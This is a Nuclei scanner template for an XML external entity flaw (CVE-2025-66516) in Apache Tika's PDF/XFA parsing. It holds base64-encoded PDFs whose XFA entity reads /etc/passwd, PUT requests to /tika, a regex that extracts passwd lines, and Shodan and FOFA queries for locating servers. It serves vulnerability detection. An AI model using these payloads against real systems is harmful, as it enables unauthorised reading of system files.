id: CVE-2025-66516
info:
name: Apache Tika - XML External Entity Injection
author: MathematicianGoat
severity: high
description: |
Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely, exploit requires crafted PDF input.
impact: |
Attackers can exploit XXE to read local files or cause denial of service, potentially exposing sensitive information or disrupting service.
remediation: |
Upgrade tika-core to \u003E= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to latest versions.
reference:
- https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
- https://nvd.nist.gov/vuln/detail/CVE-2025-66516
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 9.8
cve-id: CVE-2025-66516
epss-score: 0.06091
epss-percentile: 0.9049
cwe-id: CWE-611
metadata:
max-request: 2
verified: true
shodan-query: title:"Apache Tika"
fofa-query: title="Apache Tika"
tags: cve,cve2025,apache,tika,xxe,pdf,lfr
variables:
passwd_payload: "JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NTggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPgpdPgo8eGRwOnhkcCB4bWxuczp4ZHA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGRwLyIgeG1sOmxhbmc9ImVuIj4KPGNvbmZpZyB4bWxucz0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94Y2kvMy4xLyI+CiAgPHByZXNlbnQ+PHBkZj48dmVyc2lvbj4xLjc8L3ZlcnNpb24+PC9wZGY+PC9wcmVzZW50Pgo8L2NvbmZpZz4KPHRlbXBsYXRlIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hmYS10ZW1wbGF0ZS8zLjMvIj4KICA8c3ViZm9ybSBuYW1lPSJmb3JtMSIgbGF5b3V0PSJ0YiI+CiAgICA8cGFnZVNldD48cGFnZUFyZWE+PGNvbnRlbnRBcmVhLz48bWVkaXVtIHN0b2NrPSJsZXR0ZXIiLz48L3BhZ2VBcmVhPjwvcGFnZVNldD4KICAgIDxzdWJmb3JtPgogICAgICA8ZmllbGQgbmFtZT0iZGF0YSI+PHVpPjx0ZXh0RWRpdC8+PC91aT48dmFsdWU+PHRleHQ+Jnh4ZTs8L3RleHQ+PC92YWx1ZT48L2ZpZWxkPgogICAgPC9zdWJmb3JtPgogIDwvc3ViZm9ybT4KPC90ZW1wbGF0ZT4KPHhmYTpkYXRhc2V0cyB4bWxuczp4ZmE9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLWRhdGEvMS4wLyI+CiAgPHhmYTpkYXRhPjxmb3JtMT48ZGF0YT4meHhlOzwvZGF0YT48L2Zvcm0xPjwveGZhOmRhdGE+CjwveGZhOmRhdGFzZXRzPgo8L3hkcDp4ZHA+CmVuZHN0cmVhbQplbmRvYmoKeHJlZgowIDcKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAwODIgMDAwMDAgbiAKMDAwMDAwMDE1MiAwMDAwMCBuIAowMDAwMDAwMjYyIDAwMDAwIG4gCjAwMDAwMDAzMjMgMDAwMDAgbiAKMDAwMDAwMDM5OSAwMDAwMCBuIAp0cmFpbGVyCjw8IC9TaXplIDcgL1Jvb3QgMSAwIFIgPj4Kc3RhcnR4cmVmCjEyOTUKJSVFT0YK"
canary_payload: "JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NzggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL3RtcC94eGVfdGVzdF9ub25leGlzdGVudF8xMjM0NSI+Cl0+Cjx4ZHA6eGRwIHhtbG5zOnhkcD0iaHR0cDovL25zLmFkb2JlLmNvbS94ZHAvIiB4bWw6bGFuZz0iZW4iPgo8Y29uZmlnIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hjaS8zLjEvIj4KICA8cHJlc2VudD48cGRmPjx2ZXJzaW9uPjEuNzwvdmVyc2lvbj48L3BkZj48L3ByZXNlbnQ+CjwvY29uZmlnPgo8dGVtcGxhdGUgeG1sbnM9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLXRlbXBsYXRlLzMuMy8iPgogIDxzdWJmb3JtIG5hbWU9ImZvcm0xIiBsYXlvdXQ9InRiIj4KICAgIDxwYWdlU2V0PjxwYWdlQXJlYT48Y29udGVudEFyZWEvPjxtZWRpdW0gc3RvY2s9ImxldHRlciIvPjwvcGFnZUFyZWE+PC9wYWdlU2V0PgogICAgPHN1YmZvcm0+CiAgICAgIDxmaWVsZCBuYW1lPSJkYXRhIj48dWk+PHRleHRFZGl0Lz48L3VpPjx2YWx1ZT48dGV4dD4meHhlOzwvdGV4dD48L3ZhbHVlPjwvZmllbGQ+CiAgICA8L3N1YmZvcm0+CiAgPC9zdWJmb3JtPgo8L3RlbXBsYXRlPgo8eGZhOmRhdGFzZXRzIHhtbG5zOnhmYT0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94ZmEtZGF0YS8xLjAvIj4KICA8eGZhOmRhdGE+PGZvcm0xPjxkYXRhPiZ4eGU7PC9kYXRhPjwvZm9ybTE+PC94ZmE6ZGF0YT4KPC94ZmE6ZGF0YXNldHM+CjwveGRwOnhkcD4KZW5kc3RyZWFtCmVuZG9iagp4cmVmCjAgNwowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAwMTYgMDAwMDAgbiAKMDAwMDAwMDA4MiAwMDAwMCBuIAowMDAwMDAwMTUyIDAwMDAwIG4gCjAwMDAwMDAyNjIgMDAwMDAgbiAKMDAwMDAwMDMyMyAwMDAwMCBuIAowMDAwMDAwMzk5IDAwMDAwIG4gCnRyYWlsZXIKPDwgL1NpemUgNyAvUm9vdCAxIDAgUiA+PgpzdGFydHhyZWYKMTMxNQolJUVPRgo="
http:
- raw:
- |
PUT /tika HTTP/1.1
Host: {{Hostname}}
Content-Type: application/pdf
{{base64_decode(passwd_payload)}}
- |
PUT /tika HTTP/1.1
Host: {{Hostname}}
Content-Type: application/pdf
{{base64_decode(canary_payload)}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: body_1
regex:
- "root:.*:0:0:"
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains_any(body_2, "FileNotFoundException", "No such file", "xxe_test_nonexistent")'
condition: and
extractors:
- type: regex
part: body_1
group: 1
regex:
- 'data:\s*(root:x:0:0:[^\n]+)'
# digest: 4a0a00473045022100a84c6f718649a7e773ff98142bbb3216bb25b4fe1357092107672a40beaf8a6c02205e523258787f8381741e9b23361cf916ba50383e3802e0e974b2b319ffd8c5ba:922c64590222798bb761d5b6d8e72950